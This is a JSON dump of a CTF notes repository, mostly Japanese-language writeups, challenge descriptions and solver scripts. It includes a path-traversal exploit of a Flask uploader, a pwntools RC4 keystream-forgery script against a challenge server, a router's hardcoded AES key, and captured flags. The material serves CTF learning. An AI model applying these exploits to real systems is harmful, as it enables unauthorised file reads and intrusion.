"path": "/2020/HITCON_CTF_2020/AC1750/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nタイトルが`AC1750`なので`AC1750 vulnerability`でGoogle検索するとルーターに関する脆弱性が見つかる。問題文にも`My router is weird`と書いてあるので、この脆弱性が関連しているだろうと推測。\n\n* https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo\n\n脆弱性はAES暗号化部分で、keyとして`TPONEMESH_Kf!xn?gj6pMAt-wBNV_TDP`、IVとして`1234567890abcdef1234567890abcdef`が固定でセットされている部分にあるらしい。\n\n> **Encrypting the Packet**\n>\n> As explained in the previous section, the packet is encrypted with AES with a fixed key of TPONEMESH_Kf!xn?gj6pMAt-wBNV_TDP. There are a few more missing pieces to this puzzle, though. The cipher is used in CBC mode and the IV is the fixed value 1234567890abcdef1234567890abcdef. 
\n\n<!-- hitcon{Why_can_one_place_be_injected_twice} -->\n\n\n\n" }, { "alpha_fraction": 0.5733944773674011, "alphanum_fraction": 0.60550457239151, "avg_line_length": 18.16666603088379, "blob_id": "a57b41feac46f39d9956aed823566e522528337d", "content_id": "56d6bb0028eaf449cb4760d49a8e2cbc3b9d81b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 218, "license_type": "no_license", "max_line_length": 70, "num_lines": 12, "path": "/2020/Harekaze_mini_CTF_2020/rsa/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import math\nimport os\n\nexec(open(f'{os.path.dirname(__file__)}/distfiles/output.txt').read())\npe = c2+c3\n\np = math.gcd(pe,n)\nq = n // p\nd = pow(e,-1,(p-1)*(q-1))\nflag = pow(c1,d,n)\n\nprint(bytes.fromhex(hex(flag)[2:]))\n" }, { "alpha_fraction": 0.5529953837394714, "alphanum_fraction": 0.5898617506027222, "avg_line_length": 17.08333396911621, "blob_id": "ed0f399f619ba6ddf68b8cb615d75b9b9338f96e", "content_id": "9a36f0b82bda1654aad4c41cd89507cd4c924997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 59, "num_lines": 12, "path": "/2021/dCTF_2021/This_one_is_really_basic/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import base64\nimport os\n\ntext = open(os.path.dirname(__file__)+\"/cipher.txt\").read()\ncnt = 1\n\nwhile True:\n    text = base64.b64decode(text)\n    if b'dctf{' in text:\n        print(cnt, text)\n        break\n    cnt += 1\n" }, { "alpha_fraction": 0.8118811845779419, "alphanum_fraction": 0.8514851331710815, "avg_line_length": 21.55555534362793, "blob_id": "02ebe9f5e91bb2ce97447f21d12f3b9da165bd9c", "content_id": "312116e446f919197ce9537763af6785c16c9e55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 380, "license_type": "no_license", "max_line_length": 55, "num_lines": 9, "path": "/2020/WaniCTF/striped_table/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I had someone stripe the background colors of the table rows, and this is what happened!\n\nInject JavaScript into the page so that alert(19640503) runs, and you will get the flag.\n\nYou can view the source at https://striped.wanictf.org/?source\n\nhttps://striped.wanictf.org\n\nWriter : suuhito" }, { "alpha_fraction": 0.8026315569877625, "alphanum_fraction": 0.8092105388641357, "avg_line_length": 49.66666793823242, "blob_id": "746c40d2c236f490b6bfc52c02607cbacc8e726b6", "content_id": "aebdcf52cde5831696dc039d14d6061b81eb8a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 84, 
"num_lines": 3, "path": "/2021/dCTF_2021/Very_secure_website/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Some students have built their most secure website ever. Can you spot their mistake?\n\nhttp://dctf1-chall-very-secure-site.westeurope.azurecontainer.io/\n" }, { "alpha_fraction": 0.7507331371307373, "alphanum_fraction": 0.7653958797454834, "avg_line_length": 30.090909957885742, "blob_id": "16d94fabd45bc1c12f81917c2e543bfe61802e84", "content_id": "7f7d13dadeac97df50495d8d4fa37271176a37b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 341, "license_type": "no_license", "max_line_length": 160, "num_lines": 11, "path": "/2021/BCACTF_2.0/Sailing_Thru_Decryption/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I seem to have lost something while I was sailing to France. I know it was one of my pets, but I can't seem to remember his name. Could you help me remember it?\n\n[image.png](https://objects.bcactf.com/bcactf2/sailingthrudecryption/image.png)\n\nHint 1 of 2\n\nI wonder how the Navy encrypts their signals?\n\nHint 2 of 2\n\nNothing beats the French!" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.7903226017951965, "avg_line_length": 14.75, "blob_id": "679b0cbdc885e81db272c30e86110c249a7b9097", "content_id": "044360b0d164b4e33cd1ff8b96b1ca02a65cb3d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 94, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/2020/WaniCTF/Basic_RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "RSA暗号の基本的な演算ができますか?\n`nc rsa.wanictf.org 50000`\n\nWriter : Laika" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5282331705093384, "avg_line_length": 19.33333396911621, "blob_id": "35c43e129228ce026ad13d4fdf220864597f2326", "content_id": "91f29d80ba99805dcb577a3466695ea43eecca77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 549, "license_type": "no_license", "max_line_length": 51, "num_lines": 27, "path": "/2021/WaniCTF21-spring/Easy/cry-easy/encrypt.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "with open(\"flag.txt\") as f:\n flag = f.read().strip()\n\n\nA = REDACTED\nB = REDACTED\n\nplaintext_space = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ_{}\"\n\nassert all(x in plaintext_space for x in flag)\n\n\ndef encrypt(plaintext: str, a: int, b: int) -> str:\n ciphertext = \"\"\n for x in plaintext:\n if \"A\" <= x <= \"Z\":\n x = ord(x) - ord(\"A\")\n x = (a * x + b) % 26\n x = chr(x + ord(\"A\"))\n ciphertext += x\n\n return ciphertext\n\n\nif __name__ == \"__main__\":\n ciphertext = encrypt(flag, a=A, b=B)\n print(ciphertext)\n" }, { "alpha_fraction": 0.5996302962303162, "alphanum_fraction": 0.6195933222770691, "avg_line_length": 19.648855209350586, "blob_id": "c9de71d32c3744b8955fa211551df6cb25b3c9e8", "content_id": "4d5b4f1dca9bb4e947ec834b514b64a4d33d51ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3009, "license_type": "no_license", "max_line_length": 88, "num_lines": 131, "path": "/2021/RaRCTF_2021/Secure_Uploader/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nWebページのソースコードが与えられる。\n\nアップロードしたファイルを表示することができるようになっている。\n\n```py\nfrom flask import Flask, request, 
redirect, g\nimport sqlite3\nimport os\nimport uuid\n\napp = Flask(__name__)\n\nSCHEMA = \"\"\"CREATE TABLE files (\nid text primary key,\npath text\n);\n\"\"\"\n\n\ndef db():\n g_db = getattr(g, '_database', None)\n if g_db is None:\n g_db = g._database = sqlite3.connect(\"database.db\")\n return g_db\n\n\[email protected]_first_request\ndef setup():\n os.remove(\"database.db\")\n cur = db().cursor()\n cur.executescript(SCHEMA)\n\n\[email protected]('/')\ndef hello_world():\n return \"\"\"<!DOCTYPE html>\n<html>\n<body>\n<form action=\"/upload\" method=\"post\" enctype=\"multipart/form-data\">\n Select image to upload:\n <input type=\"file\" name=\"file\">\n <input type=\"submit\" value=\"Upload File\" name=\"submit\">\n</form>\n\n</body>\n</html>\"\"\"\n\n\[email protected]('/upload', methods=['POST'])\ndef upload():\n if 'file' not in request.files:\n return redirect('/')\n file = request.files['file']\n if \".\" in file.filename:\n return \"Bad filename!\", 403\n conn = db()\n cur = conn.cursor()\n uid = uuid.uuid4().hex\n try:\n cur.execute(\"insert into files (id, path) values (?, ?)\", (uid, file.filename,))\n except sqlite3.IntegrityError:\n return \"Duplicate file\"\n conn.commit()\n file.save('uploads/' + file.filename)\n return redirect('/file/' + uid)\n\[email protected]('/file/<id>')\ndef file(id):\n conn = db()\n cur = conn.cursor()\n cur.execute(\"select path from files where id=?\", (id,))\n res = cur.fetchone()\n if res is None:\n return \"File not found\", 404\n with open(os.path.join(\"uploads/\", res[0]), \"r\") as f:\n return f.read()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n```\n\nまた、Dockerfileを見るとフラグは`/flag`下にあることが分かる。\n\n```\nFROM python:3-alpine\nRUN pip install --no-cache-dir flask gunicorn\n\nRUN addgroup -S ctf && adduser -S ctf -G ctf\n\nCOPY app /app\nCOPY flag.txt /flag\nWORKDIR /app\n\nRUN chown -R ctf:ctf /app && chmod -R 770 /app\nRUN chown -R root:ctf /app && \\\n chmod -R 770 /app\n\nUSER ctf\nENTRYPOINT [\"/app/start.sh\"]\n```\n\nファイル表示部分を読むと、ファイルの読み出しは`filename`指定であることが分かるので、Directory Traversalを行ってみた。\n\n```py\[email protected]('/file/<id>')\ndef file(id):\n conn = db()\n cur = conn.cursor()\n cur.execute(\"select path from files where id=?\", (id,))\n res = cur.fetchone()\n if res is None:\n return \"File not found\", 404\n with open(os.path.join(\"uploads/\", res[0]), \"r\") as f:\n return f.read()\n```\n\nPOSTリクエストのfilenameを改ざんして`/flag`にする。\n\n![](img/2021-08-09-17-57-57.png)\n\n\nすると、pathが`/flag`と解釈され、フラグが表示された。\n\n```\n>>> import os; os.path.join(\"uploads/\", \"/flag\")\n'/flag'\n```\n\n<!-- rarctf{4lw4y5_r34d_th3_d0c5_pr0p3rly!-71ed16} -->\n" }, { "alpha_fraction": 0.7866324186325073, "alphanum_fraction": 0.8046272397041321, "avg_line_length": 77, "blob_id": "c786d83807c9b272cf2396571126ba56bd0fa2b0", "content_id": "981e732599dc1c630f6dc7e84ee6e90d798b5e6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 389, "license_type": "no_license", "max_line_length": 258, "num_lines": 5, "path": "/2020/pbctf_2020/GCombo/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "One day I spied out my friend accessing some google form to enter his secret combination lock. Afterwards, I kept bothering him about it, and he finally decided to give the link to me. 
Maybe you can figure out his combo for me and get a tasty flag in return:\n\n[link](https://docs.google.com/forms/d/e/1FAIpQLSe7sOTLHmGjmUY3iE6E7QLqeYAZDfQXsiJrz8r-ZcA_4cXNFQ/viewform)\n\nBy: theKidOfArcrania" }, { "alpha_fraction": 0.6626505851745605, "alphanum_fraction": 0.7228915691375732, "avg_line_length": 15.800000190734863, "blob_id": "8c20aff3d65bfe582b1320a148c8b70f57cefce2", "content_id": "2b61e920e90f1ecac47438028b8b02f1a174671a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 83, "license_type": "no_license", "max_line_length": 37, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/Blob/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Ha. Blob. Did you get the reference?\n\nhttp://git.ritsec.club:7000/blob.git/\n\n~knif3" }, { "alpha_fraction": 0.6321839094161987, "alphanum_fraction": 0.6896551847457886, "avg_line_length": 13.5, "blob_id": "5d3cd08f8de2f37c512b21b395ee15b2592d1cb4", "content_id": "bc94a4af57036c6958c146f919b653b59fbcdc8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 35, "num_lines": 6, "path": "/2021/HeroCTF_v3/0xSSRF/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Get the flag !\n\nURL : http://chall1.heroctf.fr:3000\n\nFormat : Hero{}\nAuthor : xanhacks\n" }, { "alpha_fraction": 0.5806328654289246, "alphanum_fraction": 0.6382005214691162, "avg_line_length": 28.307262420654297, "blob_id": "9d7fd72d8920d6f63f84c29d3322a7986a8935f5", "content_id": "0f9f7a520aea48b819d7d1fb02cf1e6612612a6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5602, "license_type": "no_license", "max_line_length": 106, "num_lines": 179, "path": "/2021/BCACTF_2.0/FNES_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\n#!/usr/bin/env python3\nimport random\nimport math\nimport time\nimport binascii\nfrom Crypto.Cipher import ARC4\nfrom Crypto.Hash import SHA\n\n\nwith open(\"flag.txt\", \"r\") as f:\n flag = f.read().strip().encode(\"ascii\")\n\nwith open(\"key.txt\", \"r\") as f:\n key = int(f.read().strip())\n\ntarget_query = \"Open sesame... Flag please!\"\n\nprint(\"\"\"\nWelcome to your Friendly Neighborhood Encryption Service (FNES)!\nIf you and a friend both run this service at the same time,\nyou should be able to send messages to each other!\nHere are the steps:\n1. Friends A and B connect to the server at the same time (you have about a five second margin)\n2. Friend A encodes a message and sends it to Friend B\n3. Friend B decodes the message, encodes their reply, and sends it to Friend A\n4. Friend A decodes the reply, rinse and repeat\nMake sure to not make any mistakes, though, or your keystreams might come out of sync...\nPS: For security reasons, there are four characters you aren't allowed to encrypt. 
Sorry!\n\"\"\", flush=True)\n\ntempkey = SHA.new(int(key + int(time.time() / 10)).to_bytes(64, 'big')).digest()[0:16]\ncipher = ARC4.new(tempkey)\n\nwhile True:\n print(\"Would you like to encrypt (E), decrypt (D), or quit (Q)?\", flush=True)\n l = input(\">>> \").strip().upper()\n if (len(l) > 1):\n print(\"You inputted more than one character...\", flush=True)\n elif (l == \"Q\"):\n print(\"We hope you enjoyed!\", flush=True)\n exit()\n elif (l == \"E\"):\n print(\"What would you like to encrypt?\", flush=True)\n I = input(\">>> \").strip()\n if (set(I.lower()) & set(\"flg!\")): # You're not allowed to encrypt any of the characters in \"flg!\"\n print(\"You're never getting my flag!\", flush=True)\n exit()\n else:\n print(\"Here's your message:\", flush=True)\n c = str(binascii.hexlify(cipher.encrypt(str.encode(I))))[2:-1]\n print(c, flush=True)\n elif (l == \"D\"):\n print(\"What was the message?\", flush=True)\n I = input(\">>> \").strip()\n m = str(cipher.decrypt(binascii.unhexlify(I)))[2:-1]\n if (m == target_query):\n print(\"Passphrase accepted. Here's your flag:\", flush=True)\n print(str(flag)[2:-1], flush=True)\n exit()\n else:\n print(\"Here's the decoded message:\", flush=True)\n print(m, flush=True)\n```\n\ndecryptした結果が`\"Open sesame... Flag please!\"`となるような暗号文を与えれば良い。\n\n```py\ntarget_query = \"Open sesame... Flag please!\"\n\n m = str(cipher.decrypt(binascii.unhexlify(I)))[2:-1]\n if (m == target_query):\n print(\"Passphrase accepted. Here's your flag:\", flush=True)\n print(str(flag)[2:-1], flush=True)\n exit()\n```\n\nただし、`flg!`が入った文字列は暗号化してもらえない。\n\n```py\n print(\"What would you like to encrypt?\", flush=True)\n I = input(\">>> \").strip()\n if (set(I.lower()) & set(\"flg!\")): # You're not allowed to encrypt any of the characters in \"flg!\"\n print(\"You're never getting my flag!\", flush=True)\n exit()\n```\n\nまた、`key`が分からないので、同じ`tempkey`を使って再現するのは無理そう。\n\n```py\nwith open(\"key.txt\", \"r\") as f:\n key = int(f.read().strip())\n\ntempkey = SHA.new(int(key + int(time.time() / 10)).to_bytes(64, 'big')).digest()[0:16]\ncipher = ARC4.new(tempkey)\n```\n\n平文と暗号文に規則性はないか確かめるために、試しに`\\x00\\x00....` と `\\x01\\x01...` を暗号化してみる。\n\n```py\nfrom pwn import *\ncontext.log_level = 'error'\n\ntarget_query = \"Open sesame... Flag please!\"\n\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('E')\nio.recvuntil('>>> ')\nc = '\\x00' * len(target_query)\nio.sendline(c)\nio.recvuntil(\"Here's your message:\\n\")\nmsg = io.recvline().strip().decode('utf-8')\nprint(msg)\n\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('E')\nio.recvuntil('>>> ')\nc = '\\x01' * len(target_query)\nio.sendline(c)\nio.recvuntil(\"Here's your message:\\n\")\nmsg = io.recvline().strip().decode('utf-8')\nprint(msg)\n```\n\n上記プログラムを実行したところ、以下の結果が得られた。\n\n```\n51d8cc259ef9571e849162d35e4d61b54b12213b77242780d6a3f1\n50d9cd249ff8561f859063d25f4c60b44a13203a76252681d7a2f0\n```\n\n`C(\\x00\\x00...)` XOR `0101...` = `C(\\x01\\x01...)` となることが分かった。\n\n```\n51d8cc259ef9571e849162d35e4d61b54b12213b77242780d6a3f1\nXOR\n010101010101010101010101010101010101010101010101010101\n=\n50d9cd249ff8561f859063d25f4c60b44a13203a76252681d7a2f0\n```\n\nよって、`C(\\x00\\x00...)` XOR `target_query#hex` を計算すれば `C(target_query)` が得られる。\n\n```py\nfrom pwn import *\ncontext.log_level = 'error'\n\ntarget_query = \"Open sesame... 
Flag please!\"\n\n# 1\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('E')\nio.recvuntil('>>> ')\nc = '\\x00' * len(target_query)\nio.sendline(c)\nio.recvuntil(\"Here's your message:\\n\")\nmsg = io.recvline().strip().decode('utf-8')\n\n# 2\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('D')\nio.recvuntil('>>> ')\nc = xor(bytes.fromhex(msg), target_query.encode('utf-8')).hex()\nio.sendline(c)\n\nio.interactive()\n\nio.close()\n```\n\n<!-- bcactf{why-would-you-attack-your-FNES????-4x35rcg} -->\n" }, { "alpha_fraction": 0.26967930793762207, "alphanum_fraction": 0.3644315004348755, "avg_line_length": 28.826086044311523, "blob_id": "22b0386ef81c894ce1833102dfc9cb38302e5fed", "content_id": "c54c9852b0a2b1b0e4b4f1bf35c05e4259fd1c0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 688, "license_type": "no_license", "max_line_length": 102, "num_lines": 23, "path": "/2021/Zh3r0_CTF_V2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Zh3r0 CTF V2\n\n* https://ctf.zh3r0.com/\n\n* 2021/06/04 19:30 JST — 2021/06/06 19:30 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ---- | --------------------------------------------- | -------------------------- | ----: | -----: |\n| Misc | [A Small Maniac's game](A_Small_Maniacs_game) | Assembler Language | 100 | 202 |\n| Web | [bxxs](bxxs) | XSS | 100 | 166 |\n| Web | [sparta](sparta) | CVE-2017-5941, unserialize | 100 | 115 |\n\n---\n\n## Result\n\n* 301 points\n\n* 135 / 509 (> 1 pt)\n" }, { "alpha_fraction": 0.3280898928642273, "alphanum_fraction": 0.3758426904678345, "avg_line_length": 45.842105865478516, "blob_id": "f5fdb14847f91486f21953d306adaaa5ff767474", "content_id": "e6de5572d2236f8d3f78b3e64f662b81ff9615c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1783, "license_type": "no_license", "max_line_length": 96, "num_lines": 38, "path": "/2021/HeroCTF_v3/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# HeroCTF v3\n\n* https://heroctf.fr/\n\n* 2021/04/24 05:00 JST — 2021/04/26 07:00 JST\n\n## Official Writeup\n\n* https://github.com/HeroCTF/HeroCTF_v3\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------------- | -------------------------- | ----: | -----: |\n| Web | [0xSSRF](0xSSRF) | SSRF | 60 | |\n| Misc | [Atoms](Atoms) | Symbol of elements | 50 | |\n| Reversing | [EasyAssembly](EasyAssembly) | Assemble | 40 | |\n| OSINT | [Find Me](Find_Me) | Image search | 10 | |\n| Crypto | [h4XOR](h4XOR) | PNG, XOR | 75 | |\n| Forensic | [HolyAbbot](HolyAbbot) | Ave Maria de Trithème | 15 | |\n| Misc | [Ping Pong](Ping_Pong) | Programing | 45 | |\n| Web | [PwnQL #1](PwnQL_#1) | SQL injection (LIKE) | 50 | |\n| Web | [PwnQL #2](PwnQL_#2) | Blind SQL injection | 75 | |\n| Misc | [Record](Record) | DNS Record | 15 | |\n| Misc | [Russian Doll](Russian_Doll) | | 50 | |\n| Forensic | [We need you 1/5](We_need_you_1_5) | Volatility (PC Name) | 50 | |\n| Forensic | [We need you 2/5](We_need_you_2_5) | Volatility (User Password) | 75 | |\n| Forensic | [We need you 3/5](We_need_you_3_5) | Volatility (IP Port) | 100 | |\n\n---\n\n## Result\n\n* 856 points\n\n* 132 / 645 (> 1 pt)\n" }, { 
"alpha_fraction": 0.29713425040245056, "alphanum_fraction": 0.36500754952430725, "avg_line_length": 22.714284896850586, "blob_id": "6de223f4a93bdcfc4c090f4fee0a80be06b83475", "content_id": "a21e0f0116650c2907fec044788df20820f08526", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 665, "license_type": "no_license", "max_line_length": 91, "num_lines": 28, "path": "/2021/DiceCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# DiceCTF 2021\n\n* https://ctf.dicega.ng/\n\n* 2021/02/06 09:00 JST — 2021/02/08 09:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | -------------------------- | ----------------------------- | ----: | -----: |\n| Web | [Babier CSP](./Babier_CSP) | Content Security Policy (CSP) | 107 | |\n| Reversing | [babymix](./babymix) | angr | 110 | |\n\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------- | ------------ | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 218 points\n\n* 274 / 1059 (> 1 pt)" }, { "alpha_fraction": 0.6516854166984558, "alphanum_fraction": 0.7902621626853943, "avg_line_length": 43.66666793823242, "blob_id": "09bad54c2871d197af7d133e639d5b7fb4c0411a", "content_id": "8a120fbdde867cc8c7acf43ccba59596738033da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 267, "license_type": "no_license", "max_line_length": 106, "num_lines": 6, "path": "/2021/Zh3r0_CTF_V2/sparta/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Spartanians are starting to lose their great power, help them move their objects and rebuild their Empire.\n\nLink - [Sparta](http://web.zh3r0.cf:6666/)\nSource - [source](https://static.zh3r0.com/sparta_0222ce1e9158932bb21b0563280fb15fb428c014.tar.gz)\n\nAuthor - DreyAnd" }, { "alpha_fraction": 0.2682395577430725, "alphanum_fraction": 0.33720508217811584, "avg_line_length": 35.25, "blob_id": "53d72fa40f9316e76b02b7f54f7578493edfac30", "content_id": "3df08ee2780d28a49232d38dea3fce90a02c4516", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5652, "license_type": "no_license", "max_line_length": 492, "num_lines": 76, "path": "/2021/BCACTF_2.0/􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\n􁫞􇽛􆖓􄺷􏟟 􄧻􆆗􇽛􏟟􊸉􇺟 􏕈􄧻􇽛􊸉􃗁􌘗􄧻􇺟, 􄧻􇺟􉗽 􏕈􄧻􁫞 􃗁􊸉􋐝􊸉􄧻􁫞􊸉􉗽 􄧻􁫞 􇽛􉂫􊸉 􌶴􆆗􃗁􁫞􇽛 􁫞􆆗􇺟􋄚􋐝􊸉 􌶴􃗁􆖓􌘗 􄧻􁫞􇽛􋐝􊸉􉯓'􁫞 􉗽􊸉􆞎􌲔􇽛 􄧻􋐝􆞎􌲔􌘗, 􏕈􉂫􊸉􇺟􊸉􊶬􊸉􃗁 􉯓􆖓􌲔 􇺟􊸉􊸉􉗽 􁫞􆖓􌘗􊸉􆞎􆖓􉗽􉯓 (1987). 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚 􏕈􄧻􁫞 􄧻 􏕈􆖓􃗁􋐝􉗽􏕈􆆗􉗽􊸉 􇺟􌲔􌘗􆞎􊸉􃗁-􆖓􇺟􊸉 􉂫􆆗􇽛, 􆆗􇺟􆆗􇽛􆆗􄧻􋐝􋐝􉯓 􆆗􇺟 􇽛􉂫􊸉 􌲔􇺟􆆗􇽛􊸉􉗽 􏟟􆆗􇺟􋄚􉗽􆖓􌘗 􆆗􇺟 1987, 􏕈􉂫􊸉􃗁􊸉 􆆗􇽛 􁫞􇽛􄧻􉯓􊸉􉗽 􄧻􇽛 􇽛􉂫􊸉 􇽛􆖓􃄏 􆖓􌶴 􇽛􉂫􊸉 􄺷􉂫􄧻􃗁􇽛 􌶴􆖓􃗁 􌶴􆆗􊶬􊸉 􏕈􊸉􊸉􏟟􁫞 􄧻􇺟􉗽 􏕈􄧻􁫞 􇽛􉂫􊸉 􆞎􊸉􁫞􇽛-􁫞􊸉􋐝􋐝􆆗􇺟􋄚 􁫞􆆗􇺟􋄚􋐝􊸉 􆖓􌶴 􇽛􉂫􄧻􇽛 􉯓􊸉􄧻􃗁. 􆆗􇽛 􊸉􊶬􊸉􇺟􇽛􌲔􄧻􋐝􋐝􉯓 􇽛􆖓􃄏􃄏􊸉􉗽 􇽛􉂫􊸉 􄺷􉂫􄧻􃗁􇽛􁫞 􆆗􇺟 25 􄺷􆖓􌲔􇺟􇽛􃗁􆆗􊸉􁫞, 􆆗􇺟􄺷􋐝􌲔􉗽􆆗􇺟􋄚 􇽛􉂫􊸉 􌲔􇺟􆆗􇽛􊸉􉗽 􁫞􇽛􄧻􇽛􊸉􁫞 􄧻􇺟􉗽 􏕈􊸉􁫞􇽛 􋄚􊸉􃗁􌘗􄧻􇺟􉯓.[6] 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚 􏕈􆖓􇺟 􆞎􊸉􁫞􇽛 􆞎􃗁􆆗􇽛􆆗􁫞􉂫 􁫞􆆗􇺟􋄚􋐝􊸉 􄧻􇽛 􇽛􉂫􊸉 1988 􆞎􃗁􆆗􇽛 􄧻􏕈􄧻􃗁􉗽􁫞.\n\n􇽛􉂫􊸉 􌘗􌲔􁫞􆆗􄺷 􊶬􆆗􉗽􊸉􆖓 􌶴􆖓􃗁 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚 􉂫􄧻􁫞 􆞎􊸉􄺷􆖓􌘗􊸉 􇽛􉂫􊸉 􆞎􄧻􁫞􆆗􁫞 􌶴􆖓􃗁 􇽛􉂫􊸉 \"􃗁􆆗􄺷􏟟􃗁􆖓􋐝􋐝􆆗􇺟􋄚\" 􆆗􇺟􇽛􊸉􃗁􇺟􊸉􇽛 􌘗􊸉􌘗􊸉. 
